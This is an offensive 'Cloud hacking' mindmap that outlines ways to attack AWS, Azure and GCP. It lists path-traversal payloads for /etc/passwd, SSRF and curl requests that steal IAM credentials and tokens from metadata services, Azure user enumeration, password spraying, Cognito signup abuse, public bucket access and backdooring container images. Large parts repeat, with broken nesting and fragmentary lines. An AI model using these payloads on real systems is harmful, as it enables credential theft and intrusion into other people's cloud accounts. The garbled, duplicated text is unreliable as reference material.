Cloud hacking
This mindmap includes information about the top methodologies used to hack the Cloud
1. Serverless Functions SaaS)
1.1. File Read
1.1.1. Path/Directory Traversal
1.1.1.1. file:///proc/self/environ
1.1.1.2. /etc/passwd
1.1.1.3. ../../../../../etc/passwd
1.1.1.4. ..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd
1.1.1.5. \/etc\/passwd
1.1.1.6. ..././..././..././..././..././..././etc/passwd
1.1.1.7. writeups
1.1.1.7.1. https://hackerone.com/reports/497771
1.1.1.7.2. https://hackerone.com/reports/229622
1.1.2. XXE
1.1.2.1. http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance/
1.2. RCE
1.2.1. File Upload
1.2.2. SSTI
1.3. SSRF
1.3.1. Token Stealing
1.3.1.1. AWS doesn't expose metadata API to Lambda
1.3.1.1.1. Although aws stores values in environment variables
1.3.1.2. Although aws stores values in environment variables
1.3.1.2.1. v1beta1 api level still allows non-headered query (until 30 Sep 2020)
1.3.1.3. v1beta1 api level still allows non-headered query (until 30 Sep 2020)
1.3.1.3.1. Although azure does gives you access to storage bucket
1.4. > vulnerable to injection attacks, improper access controls, or excessive permissions.
1.5. Analyze the code for vulnerabilities, perform injection attacks, or test function permissions using tools like AWS Lambda Security Scanner
2. Enumeration
2.1. Asset Enumeration
2.1.1. Subdomains Enumeration
2.1.1.1. Target Domain
2.1.1.1.1. A record test IP
2.1.1.1.2. Tools
2.1.1.2. SaaS Service Providers
2.1.1.2.1. https://github.com/rbsec/dnscan
2.1.1.3. This Query Confirms if the Real domain is used in Azure curl -s "https://login.microsoftonline.com/getuserrealm.srf?login=[USERNAME]&xml=1" | grep -E --colour '<NameSpaceType>[^<]+</NameSpaceType>'
2.2. Username Enumeration
2.2.1. AWS Cloud APIs
2.2.2. Azure Cloud APIs
2.2.2.1. enum_azuread_users
2.2.2.1.1. enum_azuread_users victim.com users.txt
2.2.2.2. This Query Confirms if the domain is used in Azure curl -s -X POST https://login.microsoftonline.com/common/GetCredentialType -d ""{"Username":"USERNAME"}"" | jq -e '.IfExistsResult'
2.2.3. Credential Harvesting
3. Web Applications (IaaS, PaaS, SaaS)
3.1. Cross service credentials for pivoting
3.2. Metadata API
3.2.1. Google
3.2.1.1. http://metadata.google.internal/
3.2.2. Azure
3.2.2.1. curl -i -H Metadata:true %22http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01%26resource=https://management.azure.com/%22
3.2.3. AWS
3.2.3.1. http://169.254.169.254/
3.3. Environment Variables
3.4. Access to other resources via role based access controls
4. Exposed Services
4.1. Storage
4.1.1. Providers
4.1.1.1. AWS: Simple Storage Service(s3)
4.1.1.2. Azure: Azure Storage
4.1.1.3. GCP: Google Cloud Storage
4.1.2. Common Modes
4.1.2.1. Anonymous Access
4.1.2.2. Authenticated Access
4.1.2.3. Restricted to Specific ID
4.1.3. Attack Surface
4.1.3.1. Anonymous access granted on bucket
4.1.3.2. Misconfigured write access for a resource
4.1.3.3. Restricted to auth user (any authenticated user)
4.1.3.4. Lax IAM Rules/Policies giving access to data
4.1.4. AWS Storage Buckets
4.1.4.1. Access buckets
4.1.4.1.1. https://s3.amazonaws.com/bucket_name
4.1.4.1.2. https://<bucketname>.s3.amazonaws.com
4.1.4.2. Bucket Enumeration possible via difference in error messages
4.1.4.2.1. https://s3.amazonaws.com/bucket_name/
4.1.4.3. For REST style URL we now need region tagged
4.1.4.3.1. https://s3.<region>.amazonaws.com/<bucket_name>/
4.1.4.4. Tools
4.1.4.4.1. S3Scanner
4.1.4.4.2. Bucket-stream
4.1.4.4.3. CloudScraper
4.1.4.4.4. S3-inspector
4.1.4.4.5. Buckets.grayhatwarfare.com
4.1.5. Azure Storage Account
4.1.5.1. Azure storage can be accessed by
4.1.5.1.1. https://<storagename>.blob.core.windows.net/<container>
4.1.5.2. Container Content can be listed at
4.1.5.2.1. https://<storagename>.blob.core.windows.net/<container>?restype=container&comp=list
4.1.5.3. Container content can be directly read via web url
4.1.5.3.1. https://<storagename>.blob.core.windows.net/<container>/<file>
4.1.5.4. Contains
4.1.5.4.1. Blobs
4.1.5.4.2. Queues
4.1.5.4.3. Tables
4.1.5.4.4. Files
4.1.5.5. URLs
4.1.5.5.1. https://<accountname>.<service>.core.windows.net/?sv=2018-03-28&ss=bfqt&srt=sco&sp=rwdlacup&se=2019-09-30T17:13:23Z&st=2019-09-30T09:13:23Z&sip=88.208.222.83&spr=https&sig=LCoN4d%2B%2BZSzPtPO71fMS34k%2FhLf2Wjen9pzhlAGFfPU%3D
4.1.6. Tools
4.1.6.1. URL Scraper
4.1.6.1.1. Extracts out cloud URLs from HTML source of the website https://github.com/jordanpotti/CloudScraper
4.1.6.2. Bucket Enumeration
4.1.6.2.1. Cloud_enum: https://github.com/initstring/cloud_enum
4.2. Azure AD/Services
4.2.1. Azure AD
4.2.1.1. Authentication Method
4.2.1.1.1. PHS: (Password Hash Synchronization)
4.2.1.1.2. PTA: (Pass Through Authentication)
4.2.1.1.3. ADFS: (AD Federation Service)
4.2.1.2. Authenticated Enumeration
4.2.1.2.1. identites
4.2.1.2.2. Resources
4.2.1.2.3. Tools
4.2.1.3. unauthenticated Enumeration
4.2.1.3.1. Identify if Domain is part of AD
4.2.1.3.2. Discover Various Cloud Assets hosted on Azure
4.2.1.3.3. Enumerate Valid users via multiple API endpoints
4.2.1.4. Unauthenticated Recon
4.2.1.5. Gaining Foothold
4.2.1.5.1. Password Spray
4.2.1.6. Authenticated Recon
4.2.1.7. Abusing privileges
4.2.1.8. Lateral and Horizontal Escalation
4.2.2. Azure KeyVault
4.2.2.1. Secrets
4.2.2.1.1. tokens
4.2.2.1.2. passwords
4.2.2.1.3. Api Keys
4.2.2.2. Keys
4.2.2.2.1. encryption keys
4.2.2.3. Certificate
4.2.2.3.1. Public and private TLS/SSL certificates
4.2.3. Azure SQL Database
4.2.3.1. MS-SQL instance
4.2.3.2. Hosted under database.windows.net
4.3. AWS Cognito
4.3.1. User Pools
4.3.1.1. aws cognito-identity get-id --identity-pool-id 'region:pool_id'
4.3.2. Identity Pools
4.3.2.1. aws cognito-identity get-credentials-for-identity --identity-id 'Identity'
4.3.3. Attacks
4.3.3.1. Signup Allowed
4.3.3.1.1. aws cognito-idp sign-up --client-id <client_id> --username [email protected] --password P@ssw0rd1 --user-attributes Name="email",Value="[email protected]" Name="name",Value="user"
4.3.3.1.2. $ aws cognito-idp confirm-sign-up --client-id <client_id> [email protected] --confirmation-code XXXXX
4.3.3.1.3. Login
4.3.3.1.4. Get Credentials
4.3.3.2. Cognito Login
4.3.3.2.1. .idToken is a resultant localstorage items of interest Login can result in error as new user doesnt have profile
4.4. Containers
4.4.1. Kubernetes
4.4.1.1. Attack
4.4.1.1.1. Enumeration
4.4.1.1.2. Attack surface
4.4.1.2. Nodes
4.4.1.2.1. Can be a virtual or Physical Machine
4.4.1.2.2. Containers
4.4.1.3. Kuberneteee Control Plane
4.4.1.3.1. Kube controller manager
4.4.1.3.2. Cloud controller manager
4.4.1.4. Tools
4.4.1.4.1. Kube Scheduler
4.4.1.4.2. Kube API Server (attacking interface) Runs Kubernetes API
4.4.1.4.3. kube-proxy
4.4.1.4.4. kubelet
4.4.1.4.5. kubectl
4.4.1.4.6. kubeadm
4.4.1.4.7. Labels - Labels for identifying pods
4.4.1.4.8. Proxy - A load balancer for pods
4.4.1.4.9. etcd - Metadata service (key-value store)
4.4.1.4.10. Replication Controller – Manage replication of pods
4.4.1.4.11. JWT OpenID Connect
4.4.2. Sources
4.4.2.1. Secrets
4.4.2.2. Tokens
4.4.2.3. Passwords
4.4.2.4. Source Code
4.4.2.5. Connection Strings
4.4.3. Write Access
4.4.3.1. Pull a docker image
4.4.3.2. Update the code(backdoor)
4.4.3.3. Build and push the Image
4.4.4. Pod - A group of containers, co-located on same host
4.4.5. like a software package
5. Weak IAM Misconfigurations and Role Escalation
5.1. Found by analyzing IAM policies to id roles with excessive permissions
5.1.1. Pacu (AWS exploitation framework) can help simulate attacks and id priv escalation paths
5.2. Tools
5.2.1. PACU
5.2.2. CloudMapper
5.2.3. WeirdAAL
5.2.4. IAM Vulnerable
6. Initial Access
6.1. Github
6.2. Phishing
6.3. Web application
6.4. Password reuse
6.5. OSINT
7. Post Exploitation
7.1. Enumeration
7.1.1. AWS
7.1.1.1. Tools
7.1.1.1.1. PACU
7.1.1.1.2. ScoutSuite
7.1.1.1.3. barq
7.1.1.1.4. AWS_SERVICE_ENUM
7.1.2. AZURE
7.1.2.1. Tools
7.1.2.1.1. powerzure
7.1.2.1.2. roadrecon
7.1.2.1.3. Stormspotter
7.1.2.1.4. AzureHound
7.1.2.1.5. 365-Stealer
7.1.3. GCP
7.1.3.1. GCP_SERVICE_ENUM
7.2. Abusing
7.2.1. Azure
7.2.1.1. Automation Accounts
7.2.1.2. Intune
7.2.1.3. Virtual Macine
7.2.1.4. App registration
7.2.1.5. Developments templates
7.2.1.6. Container Registery
7.2.1.7. Azure Devops
7.2.2. AWS
7.2.2.1. S3
7.2.2.2. EBS
7.2.2.3. EC2
7.2.2.4. ECR
7.2.2.5. ECS
8. Insecure Storage
8.1. Providers
8.1.1. AWS: Simple Storage Service(s3)
8.1.2. Azure: Azure Storage
8.1.3. GCP: Google Cloud Storage
8.2. Common Modes
8.2.1. Anonymous Access
8.2.2. Authenticated Access
8.2.3. Restricted to Specific ID
8.3. Attack Surface
8.3.1. Anonymous access granted on bucket
8.3.2. Misconfigured write access for a resource
8.3.3. Restricted to auth user (any authenticated user)
8.3.4. Lax IAM Rules/Policies giving access to data
8.4. AWS Storage Buckets
8.4.1. Access AWS buckets
8.4.1.1. https://s3.amazonaws.com/bucket_name
8.4.1.2. https://<bucketname>.s3.amazonaws.com
8.4.2. Bucket Enumeration possible via difference in error messages
8.4.2.1. https://s3.amazonaws.com/bucket_name/
8.4.3. For REST style URL we now need region tagged
8.4.3.1. https://s3.<region>.amazonaws.com/<bucket_name>/
8.4.4. Tools
8.4.4.1. S3Scanner
8.4.4.2. Bucket-stream
8.4.4.3. CloudScraper
8.4.4.4. S3-inspector
8.4.4.5. Buckets.grayhatwarfare.com
8.5. Azure Storage Account
8.5.1. Azure storage can be accessed by
8.5.1.1. https://<storagename>.blob.core.windows.net/<container>
8.5.2. Container Content can be listed at
8.5.2.1. https://<storagename>.blob.core.windows.net/<container>?restype=container&comp=list
8.5.3. Container content can be directly read via web url
8.5.3.1. https://<storagename>.blob.core.windows.net/<container>/<file>
8.5.4. Contains
8.5.4.1. Blobs
8.5.4.2. Queues
8.5.4.3. Tables
8.5.4.4. Files
8.5.5. URLs
8.5.5.1. https://<accountname>.<service>.core.windows.net/?sv=2018-03-28&ss=bfqt&srt=sco&sp=rwdlacup&se=2019-09-30T17:13:23Z&st=2019-09-30T09:13:23Z&sip=88.208.222.83&spr=https&sig=LCoN4d%2B%2BZSzPtPO71fMS34k%2FhLf2Wjen9pzhlAGFfPU%3D
8.5.6. Azure storage can be accessed by
8.5.6.1. https://<storagename>.blob.core.windows.net/<container>
8.6. Tools
8.6.1. URL Scraper
8.6.1.1. Extracts out cloud URLs from HTML source of the website
8.6.1.2. https://github.com/jordanpotti/CloudScraper
8.6.2. Bucket Enumeration
8.6.2.1. Cloud_enum: https://github.com/initstring/cloud_enum
8.7. Container Content can be listed at
8.7.1. https://<storagename>.blob.core.windows.net/<container>?restype=container&comp=list
8.8. Container content can be directly read via web url
8.8.1. https://<storagename>.blob.core.windows.net/<container>/<file>
8.9. Contains
8.9.1. Blobs
8.9.2. Queues
8.9.3. Tables
8.9.4. Files
8.10. URLs
8.10.1. https://<accountname>.<service>.core.windows.net/?sv=2018-03-28&ss=bfqt&srt=sco&sp=rwdlacup&se=2019-09-30T17:13:23Z&st=2019-09-30T09:13:23Z&sip=88.208.222.83&spr=https&sig=LCoN4d%2B%2BZSzPtPO71fMS34k%2FhLf2Wjen9pzhlAGFfPU%3D
8.10.2. https://<storagename>.blob.core.windows.net/<container>
8.10.3. https://<storagename>.blob.core.windows.net/<container>?restype=container&comp=list
8.10.4. https://<storagename>.blob.core.windows.net/<container>/<file>
8.10.5. https://<accountname>.<service>.core.windows.net/?sv=2018-03-28&ss=bfqt&srt=sco&sp=rwdlacup&se=2019-09-30T17:13:23Z&st=2019-09-30T09:13:23Z&sip=88.208.222.83&spr=https&sig=LCoN4d%2B%2BZSzPtPO71fMS34k%2FhLf2Wjen9pzhlAGFfPU%3D
8.11. Bucket Enumeration
8.11.1. Cloud_enum: https://github.com/initstring/cloud_enum
9. SSRF
9.1. IaaS
9.1.1. File uploaders, avatar fetchecers, RSS feed parsers, PDF gen svs
9.1.2. Import/Export Features
9.1.3. External APIs that let users input a URL
9.1.4. Exploit SSRF to grab sensitive info from AWS, Azure Cloud or Google Cloud metadata servioce
9.1.4.1. AWS
9.1.4.1.1. http://169.254.169.254/latest/meta-data/iam/security-credentials/
9.1.4.1.2. http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
9.1.4.2. Azure
9.1.4.2.1. curl -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-01-01 "
9.1.4.2.2. curl -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-01-01&resource=https://management.azure.com/ "
9.1.4.3. Google Cloud
9.1.4.3.1. curl "http://metadata.google.internal/computeMetadata/v1/instance/ " -H "Metadata-Flavor: Google"
9.2. SaaS
9.2.1. Internal API and Admin interface
9.2.2. 3rd party integrations
9.2.3. intra-application SSRF
9.3. PaaS
9.3.1. Internal APIs and Servioces
9.3.2. Service bindings and cloud secrets
9.3.3. Metadata endpoint
9.3.3.1. Google cloud: http://169.254.169.254/computeMetadata/v1
9.4. Exploit SSRF to grab sensitive info from AWS, Azure Cloud or Google Cloud metadata servioce
9.4.1. AWS
9.4.1.1. http://169.254.169.254/latest/meta-data/iam/security-credentials/
9.4.1.2. http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
9.4.2. Azure
9.4.2.1. curl -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-01-01 "
9.4.2.2. curl -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-01-01&resource=https://management.azure.com/ "
9.4.3. Google Cloud
9.4.3.1. curl "http://metadata.google.internal/computeMetadata/v1/instance/ " -H "Metadata-Flavor: Google"
9.5. AWS
9.5.1. http://169.254.169.254/latest/meta-data/iam/security-credentials/
9.5.2. http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
9.6. Azure
9.6.1. curl -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-01-01 "
9.6.2. curl -H "Metadata: true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-01-01&resource=https://management.azure.com/ "
9.7. Google Cloud
9.7.1. curl "http://metadata.google.internal/computeMetadata/v1/instance/ " -H "Metadata-Flavor: Google"
9.8. Metadata endpoint
9.8.1. Google cloud: http://169.254.169.254/computeMetadata/v1
10. Attacking Misconfigurations
10.1. Misconfigured Storage Buckets (S3 Buckets can expose sensitive data to public
10.1.1. AWS CLI, S3Scanner, Bucket Funder will find publically assible S3 bukets -> sensitive data or improper permissions
10.2. Exposed management interfaces like AWS Mgmnt Console or Azure Portal with no or weak MFA
10.3. Tools
10.3.1. S3Scanner
10.3.2. AWS BucketDump
10.3.3. GCP Bucket Brute
10.3.4. Scoutsuite, CloudMapper, Prowler
10.3.5. CloudFox
10.3.5.1. Situational awareness, loot folder
10.3.6. CloudSploit
10.3.7. Prowler